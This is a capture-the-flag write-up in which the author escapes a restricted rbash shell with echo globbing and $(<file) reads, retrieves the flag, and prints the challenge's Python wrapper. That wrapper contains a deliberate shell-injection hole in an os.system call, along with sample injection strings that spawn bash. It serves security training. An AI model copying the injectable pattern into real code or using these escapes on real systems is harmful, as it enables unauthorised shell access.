No flag for you
Category: Misc
MEDIUM
Welcome to the most restrictive shell ever, with only 2 semi-functional non-shell commands.
Connect via
nc noflag.sdc.tf 1337
Solution
I always enjoy shell escape challenges. Challenge started in shell, where only two commands are available: ls
and
cat
, both with very limited functionality. Some basic built-in shell commands are also present. Some examples below.
nc noflag.sdc.tf 1337
There is no flag here.
rbash$ ls
README
bin
opt
rbash$ cat README
Hahahahahaha!
Welcome to the most restrictive shell ever. Don't even try to escape this.
rbash$ ls bin
cat
ls
rbash$ cat bin/ls
No flag for you!
rbash$ ls ../
ls: cannot open directory '../': Permission denied
rbash$ ls /
ls: cannot open directory '/': Permission denied
rbash$ ls opt
rbash$ cd opt
/bin/rbash: line 0: cd: restricted
rbash$ /bin/bash
/bin/rbash: /bin/bash: restricted: cannot specify `/' in command names
After a while, I found the way to browse the list of files with echo ;-)
rbash$ echo ../*
../no-flag.py ../run
rbash$ echo /*
/bin /boot /dev /etc /home /lib /lib32 /lib64 /libx32 /media /mnt /opt /proc /root /run /sbin /srv /sys /tmp /usr /var
rbash$ echo opt/*
opt/flag-b01d7291b94feefa35e6.txt
And the content of files as well…
rbash$ echo $(<opt/flag-b01d7291b94feefa35e6.txt)
sdctf{1t'5_7h3_sh3ll_1n_4_shEll}
It was not intented solution, as I read ../no-flag.py
.
rbash$ IFS=""; echo $(<../no-flag.py)
#! /usr/bin/env python3
import os, sys
RBASH_PATH = '/bin/rbash'
RUN_DIRECTORY = os.path.dirname(os.path.realpath(__file__)) + '/run'
print('There is no flag here.')
# Vulnerable to shell injection!
# Sample escape (without ``) without check_quotes: `';bash #`
# Sample escape (without ``) that passes check_quotes: `';bash -c 'bash`
os.chdir(RUN_DIRECTORY)
def check_quotes(ipt: str):
quote_count_even = True
for c in ipt:
if c == "'":
quote_count_even = not quote_count_even
if not quote_count_even:
# Give an error message telling participants that they are on the right track
print("rbash: INTERNAL ERROR!")
return False
return True
try:
while True:
ipt = input('rbash$ ')
if check_quotes(ipt):
os.system("PATH='{}/bin' {} --noprofile --norc -c '{}' 2>&1".format(RUN_DIRECTORY, RBASH_PATH, ipt))
except EOFError:
pass
Flag
sdctf{1t'5_7h3_sh3ll_1n_4_shEll}